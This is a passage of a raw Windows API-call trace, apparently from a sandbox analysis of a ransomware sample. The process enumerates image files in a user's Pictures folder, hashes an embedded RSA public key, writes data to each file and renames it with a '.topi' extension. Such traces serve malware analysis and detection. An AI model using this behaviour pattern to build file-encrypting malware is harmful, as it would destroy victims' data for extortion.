Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9438 | out: hHeap=0x680000) returned 1 [0095.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9450 | out: hHeap=0x680000) returned 1 [0095.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0095.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9450 [0095.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9438 [0095.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0095.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9450 | out: hHeap=0x680000) returned 1 [0095.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9438 | out: hHeap=0x680000) returned 1 [0095.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.300] GetCurrentThreadId () returned 0x8c4 [0095.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f5f50 [0095.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.300] GetCurrentThreadId () returned 0x8c4 [0095.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9438 [0095.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0095.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9450 [0095.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9420 [0095.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9468 [0095.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8eb0 [0095.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9438 | out: hHeap=0x680000) returned 1 [0095.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9438 [0095.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9438 | out: hHeap=0x680000) returned 1 [0095.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9468 | out: hHeap=0x680000) returned 1 [0095.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9450 | out: hHeap=0x680000) returned 1 [0095.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9420 | out: hHeap=0x680000) returned 1 [0095.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9408 | out: hHeap=0x680000) returned 1 [0095.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1ad0 | out: hHeap=0x680000) returned 1 [0095.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.304] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f72d8*, nNumberOfBytesToWrite=0x24e9, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f72d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x24e9, lpOverlapped=0x0) returned 1 [0095.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f72d8 | out: hHeap=0x680000) returned 1 [0095.304] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x24ee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.304] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.305] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.305] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.305] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.305] CloseHandle (hObject=0x6a8) returned 1 [0095.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0095.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.306] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3C_zMbuR.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\3c_zmbur.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3C_zMbuR.jpg.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\3c_zmbur.jpg.topi")) returned 1 [0095.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.307] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.309] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.309] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48f02260, ftCreationTime.dwHighDateTime=0x1d5c520, ftLastAccessTime.dwLowDateTime=0x2dc78090, ftLastAccessTime.dwHighDateTime=0x1d5b617, ftLastWriteTime.dwLowDateTime=0x2dc78090, ftLastWriteTime.dwHighDateTime=0x1d5b617, nFileSizeHigh=0x0, nFileSizeLow=0x26af, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3fba8e.png", cAlternateFileName="")) returned 1 [0095.309] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0095.309] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0095.309] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.309] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3fba8e.png") returned=".png" [0095.309] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3fba8e.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\3fba8e.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.309] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=9903) returned 1 [0095.309] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.313] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x2689, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.313] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.314] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.314] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.314] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.314] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x26af, lpOverlapped=0x0) returned 1 [0095.314] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.314] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.314] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.314] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.314] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.315] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.315] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.315] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.315] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.316] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.316] GetLastError () returned 0x0 [0095.316] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.316] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.316] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.316] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.316] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.316] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.316] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.316] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.316] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.316] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x26b0) returned 0x99f72d8 [0095.316] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.316] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 